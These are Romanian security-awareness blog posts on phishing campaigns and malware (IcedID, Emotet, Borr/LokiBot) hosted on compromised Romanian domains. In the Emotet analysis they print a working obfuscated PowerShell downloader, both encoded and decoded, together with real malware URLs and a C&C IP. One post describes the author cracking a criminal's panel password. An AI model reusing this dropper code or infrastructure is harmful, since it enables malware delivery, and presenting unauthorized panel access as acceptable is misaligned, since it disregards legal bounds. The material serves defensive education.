Card de credit – NetFlix – Microsoft – 3 atacuri phishing intr-o singura actiune hacking

Am observat că hackerii vor sa economisească timp, atunci când vine vorba de anumite atacuri. Mai exact, într-un scenariu de hacking adaugă mai mute tehnici sau mai multe ținte de atac.

În articolul de astăzi vom face o prezentare a unui atac ce conține 3 ținte.
Șansele de succes ale hackerului sunt mai mari, dar asta nu înseamnă ca poate avea succes cu toate 3, deoarece utilizatorii de internet nu au conturi peste tot, dar cei care le au pe toate 3… uhhh… destul de grav.

Scenariul hackerului începe cu trimiterea în masă de email-uri la adrese culese din breșele facute publice, poate avea preferințe pe o anumită țară sau aruncă în toate direcțiile și ce prinde prinde. Email-ul anunță utilizatorul că există ceva probleme la contul său de NetFlix, dupa care cere sa se logheze utilizatorul la contul de Netflix, ca mai apoi la cel de Microsoft (da, nici eu nu vad motivul…), undeva într-o imagine am vazut ți opțiunea de logare cu Facebook(nu știu dacă se urmărea și contul de FB), dupa care … partea cea mai interesantă… dere datele personale (nume, prenume, data nașterii), numere mamei (știm că este folosit la întrebările de siguranță), cere datele cardului de credit (numar, data expirare, cvv)… să zicem ok, dar cere și PIN-ul cardului de credit (PIn-ul se foloseste doar cand folosești cardul la ATM sau la cumpărături). Confirmă primirea datelor, după care elegant te redirecționează catre pagina oficială NetFlix, unde vei vedea că totul este ok și esti bucuros că ti-ai „deblocat” contul singur…

În imaginile de mai jos puteți vedea cursul scenariului. De preferat să nu parcurgeți scenariul, în cazul în care primiți astfel de mesaje!!!

Am încadrat cu roșu aspectele mai interesante, pentru a putea fi mai ușor de identificat!

De aceea vă cerem să nu acceptați tot ceea ce se ofera în mediul online. Atenție la detalii și folosiți semnul întrebării la orice!

Domenii si servere din Romania folosite pentru activitati de criminalitate cibernetica – Securizarea paginilor web o necesitate.

Astăzi vom discuta despre un subiect ce devine tot mai intens: Dece să platesc pentru servicii de securitate cibernetică?

Ei bine, clienții sau potențialii clienți ai serviciilor de securitate cibernetică sunt de mai multe feluri: pricepuți, înțelegători, curioși, indiferenți, fără buget, cu buget, pricepuți, foste victime, prieteni ai unor victime etc.
Impactul unei breșe de securitate asupra acestora se diferențiază prin deciziile anterioare atacului: S-a facut ceva, orice… sau Nu s-a facut nimic!

Așa cum scrie si în titlul acestui articol, astazi vă vom prezenta câteva imagini despre servere/domenii din Romania, care sunt folosite pentru activități ilegale, prin intermediul cărora încercăm să atragem atenția asupra necesității implementării unor standarde de securitate cibernetică.


În principiu, majoritatea sunt folosite pentru gazduirea de pagini false (Paypal, DHL, LinkedIn, EMS, Banci, Emails, Eshops… etc), pentru gazduirea de fișiere virusate( acestea le vom prezenta într-un articol viitor), redirecționări către alte pagini … etc
Problema este că majoritatea deținătorilor de pagini web nu știu ce se petrece în spatele cortinei și de aceea este nevoie ca fiecare să conștientizeze impactul negativ asupra celorlalti utilizatori de internet, sau chiar rasupra lor!

Se poate observa că unele dintre paginile false au ca țintă utilizatori din China, ceea ce clarifică naționalitatea hackerilor, sau cel putin naționalitatea potențialelor victime.

Lista putea fi mai lungă, dar multe dintre domeniile gasite sunt deja remediate sau sunt în curs de remediere.

Trebuie să ne implicăm și să fim responsabili!

Pentru a încheia cu un răspuns la întrebarea de la începutul articolului trebuie ca toți să conștientizăm pericolul din spatele unui server/ domaniu compromis și faptul că involuntar am ajutat la furtul de date, furt de bani, furt de identitate etc.

Articolul conține informații publice!
Sursa: urlscan.io

Virusul bancar ICEDID (BOKBOT) prezent pe serverele si domeniile din Romania. – Analiza malware pentru toți!

Așa cum am menționat și in articolele precedente, a deține o pagină web aduce de la sine o responsabilitate.
Timpurile paginilor ce erau …sparte și hackerul înlocuia index-ul pentru a se mândri cu isprava sa… au cam trecut.

O pagina vulnerabilă înseamnă încă un magazin deschis pentru hackeri. Vor folosi pagina pentru a raspândi fișiere infectate, redirecționări spre alte pagini, stocare de fișiere malware/ date și astfel deținătorul de pagină devine un susținător al activităților ilegale, fără a cunoaște acest lucru.

În urma cautărilor zilnice (activitate standard a celor din domeniul securității cibernetice..), echipa a descoperit legături intre virusul bancar și domeniile din Romania.
Drept urmare, in continuare vom detalia puțin informațiile gasite și speră să fie înțeleasă gravitatea situației.

Vom face o analiză simplă, fără a fi nevoie de cunoștințe aprofundate în analiză malware.

ICEID (BOKBOT)
Virus bancar descoperit de analiști prin Septembrie 2017.
Este răspândit catre victime cu ajutorul paginilor web prin injectarea alterarea acestora, sau prin intermediul mesajelor trimise prin email, cărora le sunt atașate anumite fișiere capcană.

În cazul de fața virusul a fost plasat către victime prin email.
De înțeles faptul că emailul poate conține texte prin care atacatorul manipulează victima, invocând diverse scenarii, încât acesta să descarce documentul din atașament.
Acest document poate avea diverse denumiri, în funcție de ținta atacatorului. În unele cazuri, când ținta este foarte clară, acesta va folosi exact ce ar avea credibilitate pentru victimă.

Exemple:
Pentru firme: Factura, Instiintare, Avertisment, Cerere, Raspuns la cerere, Ordin de plata etc;
Pentru persoane: Factura, Cupon, Reducere, Avertizare etc.
Scopul este foarte clar: Convingerea petențialei victime să descarce și să deschidă documentul atașat!

Emailul în cauză are un document atașat și îl vom denumi Factura.doc.
La deschiderea documentului textul era ascuns sub pretextul că nu este activă o anumită funcție și se cere activarea ei.
* Nu este nevoie să îl deschideți, vreau doar să vedeți cum arată!

Puteți vedea cum arată documentul și prima reacție a scriptului, DACĂ activați funcțiile cerute.

Ok. Punem documentul pe VirusTotal.com, să vedem ce informații poate să ne ofere.


Ok, hai să vedem ce informații avem despre acest document și ce putem găsi noi! Link VirusTotal
Detecție 37/63. Adica, 37 din cele 63 de soluții antivirus ne spun că este un virus!
Toate acele cuvinte cheie vă vor arata da explicații despre document folosind Google search: docx, email-pattern, enum-windows, exe-pattern, handle-file, obfuscated, open-file, run-dll, url-pattern, write-file.
Pentru a ușura căutările vă ajut cu cele ce atrag atenția:
macros (functie de automatizare a documentului sau un șir de comenzi vizibile sau invizibile) – interesant nu?
obfuscated (metodă de ascundere a unui funcții, cod sursă, comenzi…)
url-pattern (ce este url-ul? o adresă http(s): ….., deci posibil să existe un url în document)
Încercați Google search pentru a găsi informații!

Încă nu sunteți convinși de existența virusului și documentul este foarte … important?!?
OK!
Mergem la pagina detalii: Detalii VirusTotal

În aceasă pagină gasim multe informații despre documentul scanat!

Hmmm… din limbile declarate sau găsite, cam ne dăm seama de unde provine documentul…
Aplicația clară Microsoft Word,
Ținta de bază este un script… unde apare și o pagină web românească
Documentul a fost creat: 27.02.2020
Și Название = Nume… :)

Mergem mai departe…
Relațiile/ conectările documentului cu alte surse: Link

A fost scanat pe VirusTotal in data de 07.03.2020, detectie 5/72 și era in legătură directă cu pagina românească.
Restul sunt scanări ale documentului, având ca sursă alte pagini web.

Comportamentul documentului în calculator, la activare.

Detaliile continuă și puteți vedea comportamentul documentului.
Aici se clarifică și relația dintre virus și pagina românească.
Pagina este folosită pentru ca documentul să descarce virusul de pe adresa sa.
Hackerul a încărcat virusul: /wp-content/uploads/2020/02/0303/ginndoe.jp

Avem și comenzile executateZXTRTU.exe

Aici lucrurile sunt deja clare:
– Documentul este deschis cu Microsoft Word, este activată acea funcție de editare/ vizualizare a conținutului.
-Se executa comanda de descărcare a documentului ginndoe.jp de pe pagina web.
-Documentul ginndoe.jp aruncă virusul în C cu denumirea ZXTRTU.exe( vezi foto 2 unde apare execuția)
Powershell-ul cere o pauza de 4 secunde (powershell -C Sleep -s 4) după care îi dă fișierului ZXTRTU.exe comanda de start (Saps C:\DiskDrive\1\Volume\BackFiles\ZXTRTU.exe)

Informații bune putem primi și de la comunitatea VirusTotal! Link detalii

Da… chiar foarte utile!
Se pare că același virus are legătură și cu o altă pagină românească!
Acolo a fost încarcat fișier .doc, deci nu virusul așa cum am văzut pe celălalt domeniu .ro.

Hai să găsim ceva informații despre domeniile .ro găsite.

Ambele găzduite pe Romarg, domenii .ro, Ip-uri diferite
Cataclean Eroare 404 – Nu îl gasește,
Ventilatoar-aer – În construcție
Posibil ca deținătorii s[ fi fost anunțați și au luat măsuri imediat!

În concluzie, nu trebuie să fie cineva expert pentru a putea verifica un document suspect, un email venit „urgent”.
Așa cum am spus și în postări anterioare, mai ales pe Facebook: La tot ce vedeți, trebuie să puneți semnul întrebării!!!
Chiar este email de la un prienten?
Dece mi-a trimis șeful ordinul de plată prin email?
etc…

Informațiile prezentate au surse publice:
https://www.malware-traffic-analysis.net/2020/03/03/index2.html
https://www.virustotal.com/gui/file/3b9c6e35c90a3ef5f90cbecd6ad257d4d296832b00ef7dff00ecfabae4206559/detection

Ca și bonus o să postez și scanarea botnet-ului: ZXTRTU.exe

Relația cu aceste domenii poate fi de trimitere/ descărcare date.

Atenție la detalii!!!

Hacking the Hacker – Pe urma hackerilor

Acest articol este despre: cum un hacker poate deveni victimă sau cum pot fi prinși unii actori ai activităților ilegale.

Voi incepe cu un articol postat de curând: https://www.prodefence.ro/borr-malware-acces-in-panoul-de-control/
Un articol scurt, dar la obiect și după cum veți vedea, ultima frază este despre posibilitatea ca unul din log-urile de acolo sa fie chiar al hackerului.
Este o simplă analiză de securitate cibernetică și trebuie tratată ca atare. O prezentare a activitații unei persoane ce acționează impotriva unor utilizatori, ce nu sunt pregătiți să își protejeze datele personale.
Un hacker a setat virusul, in cazul de fața fiind vorba despre BorrMalware, un virus ce fură toate date personale importante de la victime.. iar la final, a testat virusul la el in calculator pentru a vedea dacă funcționeaza.

Ceea ce este marcat cu roșu este chiar rezultatul testului pe calculatorul hackerului.

Greșeala lui a fost că a setat panelul (locul unde se stocheaza datele furate) virusului cu o parola nu prea complicată și în urma unor proceduri (teste de penetrare – pentesting) am reușit sa găsesc combinația potrivită.
Deci am intrat, am vazut și am inceput sa analizez datele.

Ok. Hai să detaliem informațiile!

In principiu, din datele lui am gasit: numele întreg (numele utilizatorului pc), referință la o analiză malware (fiind implicat unul din domeniile gasite – domeniul nu mai este online), un cont pe o platformă de gazduit fișiere și un cont pe o altă platformă de gazduire web și cont pe o plafrorma de plați online :).
Nu e rău, cert fiind faptul că e clară intenția lui.
Bun, cu numele este clar, stim cine este! – Domeniul cu referință la lokibot este ok, posibil să fie tot BorrMalware… hai sa vedem restul!

Analiza virusului, gasită prin cautarea pe Google a adresei.

Virusul fură aveleași date ca BorrMalware, deci doar este trecut LokiBot, fiind asemanatoare modalitatea de colectare, sau BorrMalware are la bază LokiBot.

Contul de Mega – file hosting/sharing

După cum se vede, aici stochează datele furate de la victimele sale! Iar ce a furat este asemănător cu ceea ce există in imaginea de mai sus, cea cu log-urile lui.

Serverul web unde posibil să aibă alte domenii de stocare a datelor personale furate.

3 panel-uri de stocare a datelor personale furate de la victime. Deci este pornit bine pe treaba asta cu furatul datelor…

Despre Qiwi.

Qiwi este o platformă de plați online. Nu este nevoie de mai multe informații, fiind clar ca acolo se gasesc toate datele personale ale … hackerului, adica găsim acolo ceea ce el fură de la persoane nevinovate… hmmm… Interesant nu?

Bun, deci ce avem despre hacker-ul nostru?
Păi cam tot ce ar avea nevoie o instituție, pentru a putea identifica hoții de date, cărți de credit, identitate etc.

A … și dovada testului său in calculatorul personal:

Datele prezentate sunt acoperite pentru a nu crea probleme persoanei vizate, chiar dacă acțiunile acesteia sunt dăunătoare pentru ceilalți.

Cam asta a fost. Sper să fie destul de educativ articolul, în speranța că ne educăm intre noi… din mers!

Furt de date personale: Cont Paypal + Bancar, Carte de credit, Identitate, Email

Furtul de date, a devenit una dintre cele mai practicate metode ale celor ce vor să facă bani ilegal.
Datele furate pot fi folosite in mai multe moduri, dar in acest articol vom vorrbi despre metoda phishing. Phishing-ul este o inșelătorie ce are loc in mediul online si se bazează pe credibilitatea potențialelor victime, dar și pe lipsa de educație in ceea ce privește siguranța online.

Acesta este un email de tip phishing, ce se presupuna ca vine de la Paypal si notifica utilizatorul ca exista probleme de securitate, cerând mai apoi o serie de date pentru „remedierea problemei”.

Sus se poate observa că a fost marcat ca Foarte Important, ca fiind Personal si cu raspuns de confirmare a primirii. Toate acestea pentru a mari credibilitatea mesajului.
In principiu se cere Confirmarea contului, acesta fiind limitat. Avem indicații pentru toată aceasta operațiune și ne anunța că după incheierea procedurii durează 2 zile până la confirmarea contului….
2 zile in care persoana din spatele operațiunii poate folosi fără probleme datele colectate.
Marcat cu roșu am atașat o parte din ceea ce nu se vede in email, mai exact, faptul că mesajul nu vine de la Paypal ci de la un domeniu oarecare.

Din nou pentru credibilitate redirectionează victima spre 2 pagini de securitate: Un anunț că a fost detectată o activitate anormală pe contul de Paypal si o formă de confirmare a persoanei din spatele calculatorului.
A 3-a pagină este un fals ce imita calea de acces in contul PayPal, unde se cere adresa de email/ telefon și parola.
Dacă observați in partea de sus a imaginilor apare adresa paginii web… si clar că nu are legatură cu platforma PayPal, adresa reala fiind: https://www.paypal.com/

După adaugare datelor de logare victima este direcționată spre alte pagini in care trebuie sa introducă… cam tot ce are. Aceasta campanie de phishing fiind una din cele mai complexe din căta am vazut. Asta, deoarece se atentează datele cartii de credit, datele contului bancar, date de identificare personală.
Prima campanie phishing in care se cere si adaugarea unui al doilea card de credit!

Și pentru a avea garanția că va putea accesa toate aceste cere in plus datele autentificării de siguranța a contului bancar precum și datele de logare pe adresa de email. In cazul in care ceva nu merge, să poată cere acces prin intermediul adresei de email, folosind cartea de identitate, permisul de conducere, pașaportul sau orice alt act a fost trimis de victimă.

Se confirmă faptul că (ti-au luat tot) s-a activat protectia contului si se face redirecționare catre pagian oficială PayPal, unde victima se loghează si totul o sa pară ok, neștiind că tocmai a dat toate datele unei persoane ce desfășoară activitați ilegale.

Cam acesta a fost articolul de astăzi. Sper să fie destul de educativ, incât sa se reducă numărul persoanelor ce devin victime ale furtului de date, bani, identitate.

Dacă aveți probleme și nu sunteți siguri de anumite email-uri importante, nu ezitați să ne contactați: [email protected]

Borr Malware – Acces in panoul de control

Citește mai mult

Emotet – Virus bancar – Prezent pe domenii din Romania

Hai să începem cu informațiile de bază!

Emotet este un virus din categoria Trojan sau mai degrabă un downloader, care are nevoie de acceptul victimei pentru a își începe activitatea în noua gazdă.
Este cheia care deschide ușa pentru adevăratul virus, care are ca scop extragerea de date personale, pentru ca hackerul să poată utiliza contul sau cardul victimei în scopuri personale.

Dacă la începuturi era trimis prin email ca executabil, sau atasat(backdoor) anumitor programe „gratuite”, acum trimiterea lui se face prin intermediul unor documente care sunt trimise prin email, îar aceste documente conțin o comandă de descărcare și o adresă web, iar virusul este descărcat de acolo și actionează în noua gazda(pc, mobilr etc).
Aceasta metodă este folosită pentru a păcăli atât protecția serviciilor de email, cât și viitoarea victimă.

La intrarea virusului cu acceptul victimei, șansele de scapare se bazează doar în posibilitatea de recunoaștere a virusului respectiv de catre antivirus, firewall… în funcție de ce are victima în dispozitiv.

Dar sa trecem la povestea noastră și o sa facem o mică analiză malware.
Zilnic apar liste cu Ip-uri, domenii, dispozitive compromise. Una dintre aceste liste conține două domenii de România.
Se presupune că sunt controlate de hackeri și folosite pentru a își gazdui fisierele lor malware.

Accesam adresele si vedem ca ambele contin fisiere .doc.
De precizat ca pana aici Antivirusul nu reactioneaza.

Dupa cum se poate observa, fisierele sunt descarcate de pe aceste domenii de Romania (.ro) si apar ca fiind documente Microsoft Word 97-2003.

La scanare, virusul apare detectat de numai 18 si cei 60 de vendori prezenti pe platforma. Drept urmare, o mare parte si solutiile antivirus NU vor reactiona la aparitia virusului in dispozitiv.
In aceata varianta, doar aplicatiile celor de mai sus pot identifica virusul.
Iata si motivul detectiei slabe, virusul a fost creat… astazi. Ceea ce denota ca hackerul vine cu variante „curate” pentru a evita detectia.
http://trangvang.info.vn/home/pxxx7l/
https://74.101.225.121/tGQWzXxxxhSt
http://trangvang.info.vn/home/pxxx7l/
https://74.101.225.121/tBUxxxQWaf5EyJ8

Acum, pentru a avea o idee despre ce se intampla…
Comanda documentului arata cam asa: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE” /n „C:\Users\admin\AppData\Local\Temp\2050519442433378869714090.doc

Comanda folosita de Powershell este ascunsa si criptata:

Powershell -w hidden -en JABNAGEAdABlAGQAdgB0AG4AZAA9ACcASABpAGoAcgBsAGsAbABjAG4AYgAnADsAJABYAGcAbQB4AGkAagBsAHEAaQBjAGsAbABpACAAPQAgACcAMQAzADkAJwA7ACQATABhAHkAcABvAHQAdwBrAG4APQAnAFMAcwBrAGYAYwBkAHMAaQBrAHcAYwBjACcAOwAkAFkAcQBlAGkAcwBoAHIAZgB0AG0AcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWABnAG0AeABpAGoAbABxAGkAYwBrAGwAaQArACcALgBlAHgAZQAnADsAJABSAGEAegBnAGcAZQBpAHAAcABzAGMAPQAnAFkAawBxAGIAdAB4AHAAegAnADsAJABTAG4AeQBsAGUAdAB6AGsAZgBqAGYAbgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAQgBDAEwAaQBFAG4AVAA7ACQARwBhAHAAawBzAGUAaQB2AGUAbwA9ACcAaAB0AHQAcAA6AC8ALwB0AHIAYQBuAGcAdgBhAG4AZwAuAGkAbgBmAG8ALgB2AG4ALwBoAG8AbQBlAC8AcABvAEkAYwA3AGwALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGYAbAB5AGIAdQB5AHMALgBuAGUAdAAvAGwAaQBiAHIAYQByAGkAZQBzAC8AeABlAHMALwAqAGgAdAB0AHAAOgAvAC8AaQBuAGYAbwByAG0AYQB0AGkAYwAtAGMAbAB1AGIALgBjAG8AbQAvAGwAYQBuAGcAdQBhAGcAZQAvAHkALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAuAHMAdABpAGMAawB5AHAAbwBzAHQALgBpAG8ALwB3AHAALQBhAGQAbQBpAG4ALwBnAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBkAHIAaQB2AGUAcgB0AHIAYQBpAG4AZQByAHMAYwBoAG8AbwBsAC4AYwBvAG0ALgBhAHUALwBsAG8AZwBzAC8AUgBZAEoAUABnAHIASwBPAEoALwAnAC4AIgBzAGAAcABsAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEcAegBqAGkAdQBhAGgAagB5AHIAeQB4AHQAPQAnAEgAZwBrAGMAZABzAGQAZgAnADsAZgBvAHIAZQBhAGMAaAAoACQASwB4AHoAdABhAGwAaABwAGkAbgB2ACAAaQBuACAAJABHAGEAcABrAHMAZQBpAHYAZQBvACkAewB0AHIAeQB7ACQAUwBuAHkAbABlAHQAegBrAGYAagBmAG4ALgAiAGQAYABvAHcATgBMAGAATwBhAEQARgBgAGkAbABFACIAKAAkAEsAeAB6AHQAYQBsAGgAcABpAG4AdgAsACAAJABZAHEAZQBpAHMAaAByAGYAdABtAHAAKQA7ACQAWQB0AHYAagBlAHIAcwB5AGEAdABoAHcAPQAnAE8AaABqAGQAZwBmAGIAcgB0AHgAbAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFkAcQBlAGkAcwBoAHIAZgB0AG0AcAApAC4AIgBsAGAAZQBuAGcAdABIACIAIAAtAGcAZQAgADMAMgA2ADgAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABhAFIAVAAiACgAJABZAHEAZQBpAHMAaAByAGYAdABtAHAAKQA7ACQATwBoAGQAdQBqAHAAdwBoAG0AegB0AGEAZwA9ACcARAB3AGwAawB3AG4AdwBqAHoAeQB1AHMAJwA7AGIAcgBlAGEAawA7ACQAWAB4AG8AbAB2AGsAdABxAD0AJwBIAHEAaAB1AGoAagBnAHoAZAB6ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAZgBpAGkAcwB4AGQAdgA9ACcAUQBnAHAAYwBmAG8AbABvAHkAbgBrAHoAZAAnAA==

Decryptata din Base64

$�M�a�t�e�d�v�t�n�d�=�’�H�i�j�r�l�k�l�c�n�b�’�;�$�X�g�m�x�i�j�l�q�i�c�k�l�i� �=� �’�1�3�9�’�;�$�L�a�y�p�o�t�w�k�n�=�’�S�s�k�f�c�d�s�i�k�w�c�c�’�;�$�Y�q�e�i�s�h�r�f�t�m�p�=�$�e�n�v�:�u�s�e�r�p�r�o�f�i�l�e�+�’�\�’�+�$�X�g�m�x�i�j�l�q�i�c�k�l�i�+�’�.�e�x�e�’�;�$�R�a�z�g�g�e�i�p�p�s�c�=�’�Y�k�q�b�t�x�p�z�’�;�$�S�n�y�l�e�t�z�k�f�j�f�n�=�&�(�’�n�e�’�+�’�w�-�o�’�+�’�b�’�+�’�j�e�c�t�’�)� �n�e�T�.�w�E�B�C�L�i�E�n�T�;�$�G�a�p�k�s�e�i�v�e�o�=�’�h�t�t�p�:�/�/�t�r�a�n�g�v�a�n�g�.�i�n�f�o�.�v�n�/�h�o�m�e�/�p�o�I�c�7�l�/��h�t�t�p�s�:�/�/�w�w�w�.�f�l�y�b�u�y�s�.�n�e�t�/�l�i�b�r�a�r�i�e�s�/�x�e�s�/��h�t�t�p�:�/�/�i�n�f�o�r�m�a�t�i�c�-�c�l�u�b�.�c�o�m�/�l�a�n�g�u�a�g�e�/�y�/��h�t�t�p�:�/�/�d�e�m�o�.�s�t�i�c�k�y�p�o�s�t�.�i�o�/�w�p�-�a�d�m�i�n�/�g�/��h�t�t�p�s�:�/�/�w�w�w�.�d�r�i�v�e�r�t�r�a�i�n�e�r�s�c�h�o�o�l�.�c�o�m�.�a�u�/�l�o�g�s�/�R�Y�J�P�g�r�K�O�J�/�’�.�”�s��p�l�I�T�"�(�[�c�h�a�r�]�4�2�)�;�$�G�z�j�i�u�a�h�j�y�r�y�x�t�=�'�H�g�k�c�d�s�d�f�'�;�f�o�r�e�a�c�h�(�$�K�x�z�t�a�l�h�p�i�n�v� �i�n� �$�G�a�p�k�s�e�i�v�e�o�)�{�t�r�y�{�$�S�n�y�l�e�t�z�k�f�j�f�n�.�"�d��o�w�N�L��O�a�D�F��i�l�E�”�(�$�K�x�z�t�a�l�h�p�i�n�v�,� �$�Y�q�e�i�s�h�r�f�t�m�p�)�;�$�Y�t�v�j�e�r�s�y�a�t�h�w�=�’�O�h�j�d�g�f�b�r�t�x�l�’�;�I�f� �(�(�.�(�’�G�e�t�-�’�+�’�I�t�e�m�’�)� �$�Y�q�e�i�s�h�r�f�t�m�p�)�.�”�l��e�n�g�t�H�"� �-�g�e� �3�2�6�8�1�)� �{�[�D�i�a�g�n�o�s�t�i�c�s�.�P�r�o�c�e�s�s�]�:�:�"�s��T�a�R�T�”�(�$�Y�q�e�i�s�h�r�f�t�m�p�)�;�$�O�h�d�u�j�p�w�h�m�z�t�a�g�=�’�D�w�l�k�w�n�w�j�z�y�u�s�’�;�b�r�e�a�k�;�$�X�x�o�l�v�k�t�q�=�’�H�q�h�u�j�j�g�z�d�z�’�}�}�c�a�t�c�h�{�}�}�$�A�f�i�i�s�x�d�v�=�’�Q�g�p�c�f�o�l�o�y�n�k�z�d�’�

Decryptata are mai multe informatii interesante:

$Matedvtnd=’Hijrlklcnb’;$Xgmxijlqickli = ‘139’;$Laypotwkn=’Sskfcdsikwcc’;$Yqeishrftmp=$env:userprofile+’\’+$Xgmxijlqickli+’.exe’;$Razggeippsc=’Ykqbtxpz’;$Snyletzkfjfn=&(‘ne’+’w-o’+’b’+’ject’) neT.wEBCLiEnT;$Gapkseiveo=’http://trangvang.info.vn/home/poIc7l/https://www.flybuys.net/libraries/xes/http://informatic-club.com/language/y/http://demo.stickypost.io/wp-admin/g/https://www.drivertrainerschool.com.au/logs/RYJPgrKOJ/‘.”splIT"([char]42);$Gzjiuahjyryxt='Hgkcdsdf';foreach($Kxztalhpinv in $Gapkseiveo){try{$Snyletzkfjfn."dowNLOaDFilE”($Kxztalhpinv, $Yqeishrftmp);$Ytvjersyathw=’Ohjdgfbrtxl’;If ((.(‘Get-‘+’Item’) $Yqeishrftmp).”lengtH" -ge 32681) {[Diagnostics.Process]::"sTaRT”($Yqeishrftmp);$Ohdujpwhmztag=’Dwlkwnwjzyus’;break;$Xxolvktq=’Hqhujjgzdz’}}catch{}}$Afiisxdv=’Qgpcfoloynkzd’

Se pot observa domeniile accesate pentru a descarca virusul, dar si comenzile de Download, GET, Item, Start…

Se pare ca intradevar acel document nu este doar ceva de citit, ci contine comenzi de descarcare a unui fisier care stim ce este, dar poate fi orice altceva.
Mai in detaliu: $Xgmxijlqickli = ‘139’ +$Xgmxijlqickli+’.exe … deci avem un 139.exe, nu?

Avem polc7l care este descris ca fiind ATLUtils Module – adica Active Template Library si mai exact este chiar fisierul nostru 139.exe.
14 din 73… destul de rau pentru posibilele victime!

Acest fisier odata executat, instaleza un alt .exe in dispozitivul victimei(da, deja victima).

Acesta se conecteaza la Ip-ul/host-ul de unde vin toate comenzile hackerului.
Virusul in sine preia comenzi date de hacker si le executa la nivel de dispozitiv.
Exemple: se poate raspandi in retea, colecteaza date, trimite date, ataca, stocheaza date, spioneaza tastatura/camera/monitor etc.

In cazul nostru dispozitivul se conecteaza la adresa http://68.114.229.171/, iar acolo se gaseste acel C&C Panel, adica Panoul de Comanda si Control al atacatorului.

Cam asta ar fi pentru astazi.
In concluzie, daca ai o pagina web sau un server si nu sunt protejate, poti deveni parte activa la activitatile ilegale ale hackerilor.
Deocamdata acest lucru nu este pedepsit, dar… in timp lucrurile se pot schimba!

In ceea ce priveste adevarata victima, grija la ce documente accesati, indiferent de la cine credeti ca provin.